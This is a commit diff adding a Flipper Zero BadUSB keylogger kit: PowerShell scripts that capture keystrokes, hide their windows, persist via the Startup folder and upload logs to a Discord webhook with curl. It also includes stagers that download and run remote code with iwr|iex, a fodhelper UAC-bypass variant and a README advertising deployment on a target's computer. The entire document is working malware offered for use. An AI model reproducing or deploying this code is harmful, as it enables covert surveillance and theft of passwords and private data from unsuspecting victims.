STRLCPY/Jakoby_FlipperZero-BadUSB

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/-keys.ps1

1	+	Add-Type -AssemblyName WindowsBase
2	+	Add-Type -AssemblyName PresentationCore
3	+
4	+
5	+	function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){
6	+	$signatures = @'
7	+	[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
8	+	public static extern short GetAsyncKeyState(int virtualKeyCode);
9	+	[DllImport("user32.dll", CharSet=CharSet.Auto)]
10	+	public static extern int GetKeyboardState(byte[] keystate);
11	+	[DllImport("user32.dll", CharSet=CharSet.Auto)]
12	+	public static extern int MapVirtualKey(uint uCode, int uMapType);
13	+	[DllImport("user32.dll", CharSet=CharSet.Auto)]
14	+	public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
15	+	'@
16	+
17	+	$API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
18	+
19	+
20	+	$null = New-Item -Path $Path -ItemType File -Force
21	+
22	+	try
23	+	{
24	+	Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
25	+
26	+	while ($true) {
27	+	Start-Sleep -Milliseconds 40
28	+	$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
29	+	$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl')
30	+	if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){exit}
31	+
32	+
33	+	for ($ascii = 9; $ascii -le 254; $ascii++) {
34	+
35	+	$state = $API::GetAsyncKeyState($ascii)
36	+
37	+
38	+	if ($state -eq -32767) {
39	+	$null = [console]::CapsLock
40	+
41	+
42	+	$virtualKey = $API::MapVirtualKey($ascii, 3)
43	+
44	+
45	+	$kbstate = New-Object Byte[] 256
46	+	$checkkbstate = $API::GetKeyboardState($kbstate)
47	+
48	+
49	+	$mychar = New-Object -TypeName System.Text.StringBuilder
50	+
51	+	$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
52	+
53	+	if ($success)
54	+	{
55	+
56	+	[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
57	+	}
58	+	}
59	+	}
60	+	}
61	+	}
62	+	finally
63	+	{
64	+
65	+	#notepad $Path
66	+	}
67	+	}
68	+
69	+	XXXlog
70	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/-logs.ps1

1	+	# powershell log scheduler
2	+	# created by : C0SM0
3	+	# Modified by : Jakoby
4	+
5	+	Add-Type -AssemblyName WindowsBase
6	+	Add-Type -AssemblyName PresentationCore
7	+
8	+
9	+	$Path="$env:appdata\-locker\$env:UserName-loot.txt"
10	+
11	+	$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1)
12	+
13	+	function Upload-Discord {
14	+
15	+	[CmdletBinding()]
16	+	param (
17	+	[parameter(Position=0,Mandatory=$False)]
18	+	[string]$file,
19	+	[parameter(Position=1,Mandatory=$False)]
20	+	[string]$text
21	+	)
22	+
23	+
24	+	$Body = @{
25	+	'username' = $env:username
26	+	'content' = $text
27	+	}
28	+
29	+	if (-not ([string]::IsNullOrEmpty($text))){
30	+	Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body \| ConvertTo-Json)};
31	+
32	+	if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc}
33	+	}
34	+
35	+	if([String]::IsNullOrWhiteSpace((Get-content "$env:appdata\-locker\log.txt"))){
36	+	# times logs will be sent [keep in military time]
37	+	$logTimes = @(
38	+	'00:00:00',
39	+	'01:00:00',
40	+	'02:00:00',
41	+	'03:00:00',
42	+	'04:00:00',
43	+	'05:00:00',
44	+	'06:00:00',
45	+	'07:00:00',
46	+	'08:00:00',
47	+	'09:00:00',
48	+	'10:00:00',
49	+	'11:00:00',
50	+	'12:00:00',
51	+	'13:00:00',
52	+	'14:00:00',
53	+	'15:00:00',
54	+	'16:00:00',
55	+	'17:00:00',
56	+	'18:00:00',
57	+	'19:00:00',
58	+	'20:00:00',
59	+	'21:00:00',
60	+	'22:00:00',
61	+	'23:00:00'
62	+	)
63	+	}
64	+
65	+	else {$logTimes = @(
66	+	(Get-content "$env:appdata\-locker\log.txt")
67	+	)
68	+	}
69	+
70	+	# sort the times in chronological order
71	+	$logTimes = $logTimes \| Sort-Object
72	+
73	+	# ensure keylogger runs every day
74	+	while ($true) {
75	+
76	+	# run keylogger for each trigger time
77	+	foreach ($t in $logTimes)
78	+	{
79	+	# checks if time passed already
80	+	if((Get-Date) -lt (Get-Date -Date $t))
81	+	{
82	+	# sleeps until next time is reached
83	+	while ((Get-Date -Date $t) -gt (Get-Date))
84	+	{
85	+	# sleeps
86	+	$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
87	+	$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl')
88	+	if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){exit}
89	+	(Get-Date -Date $t) - (Get-Date) \| Start-Sleep
90	+	}
91	+
92	+	# runs keylogger
93	+	Upload-Discord -file $Path
94	+	echo "" > $Path
95	+
96	+
97	+	}
98	+	}
99	+	}
100	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/-p.cmd

1	+	@echo off
2	+	powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
3	+	powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
4	+	powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1"
5	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/README.md

1	+	![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
2	+
3	+	<!-- TABLE OF CONTENTS -->
4	+	<details>
5	+	<summary>Table of Contents</summary>
6	+	<ol>
7	+	<li><a href="#Description">Description</a></li>
8	+	<li><a href="#getting-started">Getting Started</a></li>
9	+	<li><a href="#Contributing">Contributing</a></li>
10	+	<li><a href="#Version-History">Version History</a></li>
11	+	<li><a href="#Contact">Contact</a></li>
12	+	<li><a href="#Acknowledgments">Acknowledgments</a></li>
13	+	</ol>
14	+	</details>
15	+
16	+	# Keylogger
17	+
18	+	This is a Powershell based keylogger that exfiltrates the logs to discord
19	+
20	+	## Description
21	+
22	+	Quickly with just ONE line of code you can deploy a keylogger on your targets computer
23	+
24	+	Complete with custom logging times, and self destruct feature
25	+
26	+	Just move the `keylogger.txt` file over to your flipper and you are good to go
27	+
28	+	## Getting Started
29	+
30	+	### Dependencies
31	+
32	+	* Windows 10,11
33	+
34	+	<p align="right">(<a href="#top">back to top</a>)</p>
35	+
36	+	### Executing program
37	+
38	+	* Plug in your device
39	+	* 15 seconds later you have their keystrokes being sent to you
40	+
41	+	This is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you
42	+
43	+	* `$dc=''` is the variable where you plug in your discord webhook
44	+
45	+	```
46	+	powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https://jakoby.lol/m2m" \| iex
47	+	```
48	+	### ADDITIONAL PARAMETERS
49	+
50	+	The payload is set to send the logs collected every hour on the hour
51	+
52	+	* You maybe use the `$log` variable to specify a certain time instead (Use this for testing)
53	+	* ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm
54	+
55	+	You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date
56	+
57	+	`$ks="12/25/2022 10:00:00 PM"` <-- This will make the keylogger self delete at 10pm on December 25th
58	+
59	+	Calling the script with both a `log` time and `killswitch` will look something like this:
60	+
61	+	```
62	+	powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' \| iex"
63	+	```
64	+	### DELETING THE KEYLOGGER
65	+
66	+	Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up
67	+
68	+	<img src= https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/keylogger/kkl.png width="400" alt="C#" />
69	+
70	+
71	+
72	+	<p align="right">(<a href="#top">back to top</a>)</p>
73	+
74	+	## Contributing
75	+
76	+	All contributors names will be listed here
77	+
78	+	I am Jakoby
79	+
80	+	<p align="right">(<a href="#top">back to top</a>)</p>
81	+
82	+	## Version History
83	+
84	+	* 0.1
85	+	* Initial Release
86	+
87	+	<p align="right">(<a href="#top">back to top</a>)</p>
88	+
89	+	<!-- CONTACT -->
90	+	## Contact
91	+
92	+	<h2 align="center">📱 My Socials 📱</h2>
93	+	<div align=center>
94	+	<table>
95	+	<tr>
96	+	<td align="center" width="96">
97	+	<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
98	+	<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
99	+	</a>
100	+	<br>YouTube
101	+	</td>
102	+	<td align="center" width="96">
103	+	<a href="https://twitter.com/I_Am_Jakoby">
104	+	<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
105	+	</a>
106	+	<br>Twitter
107	+	</td>
108	+	<td align="center" width="96">
109	+	<a href="https://www.instagram.com/i_am_jakoby/">
110	+	<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
111	+	</a>
112	+	<br>Instagram
113	+	</td>
114	+	<td align="center" width="96">
115	+	<a href="https://discord.gg/MYYER2ZcJF">
116	+	<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
117	+	</a>
118	+	<br>Discord
119	+	</td>
120	+	<td align="center" width="96">
121	+	<a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
122	+	<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
123	+	</a>
124	+	<br>TikTok
125	+	</td>
126	+	</tr>
127	+	</table>
128	+	</div>
129	+
130	+
131	+
132	+	<p align="right">(<a href="#top">back to top</a>)</p>
133	+
134	+	<!-- ACKNOWLEDGMENTS -->
135	+	## Acknowledgments
136	+
137	+	* [Hak5](https://hak5.org/)
138	+	* [MG](https://github.com/OMG-MG)
139	+
140	+	<p align="right">(<a href="#top">back to top</a>)</p>
141	+
142	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/exit.ps1

1	+	Add-Type -AssemblyName WindowsBase
2	+	Add-Type -AssemblyName PresentationCore,PresentationFramework
3	+
4	+	$Path="$env:appdata\-locker\$env:UserName-loot.txt"
5	+
6	+	$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1)
7	+
8	+	function Upload-Discord {
9	+
10	+	[CmdletBinding()]
11	+	param (
12	+	[parameter(Position=0,Mandatory=$False)]
13	+	[string]$file,
14	+	[parameter(Position=1,Mandatory=$False)]
15	+	[string]$text
16	+	)
17	+
18	+
19	+	$Body = @{
20	+	'username' = $env:username
21	+	'content' = $text
22	+	}
23	+
24	+	if (-not ([string]::IsNullOrEmpty($text))){
25	+	Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body \| ConvertTo-Json)};
26	+
27	+	if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc}
28	+	}
29	+
30	+	while($true){
31	+	$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
32	+	$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl')
33	+	if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){
34	+	Upload-Discord -file $Path
35	+	sleep 5
36	+	Remove-Item "$env:appdata\-locker" -Recurse -Force;
37	+	Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
38	+	$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3)
39	+	Remove-Item "$env:appdata\-exit.ps1"
40	+	exit
41	+	}
42	+	else{continue}
43	+	}
44	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/keylogger - Copy.ps1

1	+	if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};
2	+	echo $dc > "$env:appdata\-locker\wh.txt";
3	+	echo $log > "$env:appdata\-locker\log.txt";
4	+	echo $ks > "$env:appdata\-locker\killswitch.txt";
5	+
6	+	function s1 {
7	+	$user = "$env:COMPUTERNAME\$env:USERNAME"
8	+	$isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user
9	+	if($isAdmin){
10	+	$259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 \| iex";
11	+	reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f;
12	+
13	+	}
14	+	else{
15	+	Break
16	+	}
17	+	}
18	+
19	+	s1
20	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/keylogger.ps1

1	+	if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};
2	+	echo $dc > "$env:appdata\-locker\wh.txt";
3	+	echo $log > "$env:appdata\-locker\log.txt";
4	+	echo $ks > "$env:appdata\-locker\killswitch.txt";
5	+
6	+	irm https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 \| iex
7	+
8	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/keylogger.txt

1	+	REM Title: Keylogger
2	+
3	+	REM Author: I am Jakoby
4	+
5	+	REM Description: This is a Powershell based keylogger that exfiltrates the logs to discord
6	+
7	+	REM Target: Windows 10, 11
8	+
9	+	REM ADDITIONAL PARAMETERS
10	+	REM The payload is set to send the logs collected every hour on the hour
11	+
12	+	REM You maybe use the $log variable to specify a certain time instead (Use this for testing)
13	+	REM ex: $log="09:00 pm" <-- This will send the log every night at 9pm
14	+	REM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date
15	+
16	+	REM $ks="12/25/2022 10:00:00 PM" <-- This will make the keylogger self delete at 10pm on December 25th
17	+
18	+	REM Calling the script with both a log time and killswitch will look something like this:
19	+
20	+	REM $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" \| iex
21	+
22	+	GUI r
23	+	DELAY 500
24	+	STRING powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' \| iex"
25	+	ENTER
26	+

■ ■ ■ ■ ■ ■

Payloads/Flip-Keylogger/s2.ps1

1	+	# Add-MpPreference -ExclusionPath $env:appdata/-locker
2	+
3	+	iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
4	+	iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1"
5	+	iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1"
6	+	iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/exit.ps1 -o "$env:appdata\-exit.ps1"
7	+
8	+	start-process "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
9	+

Add files via upload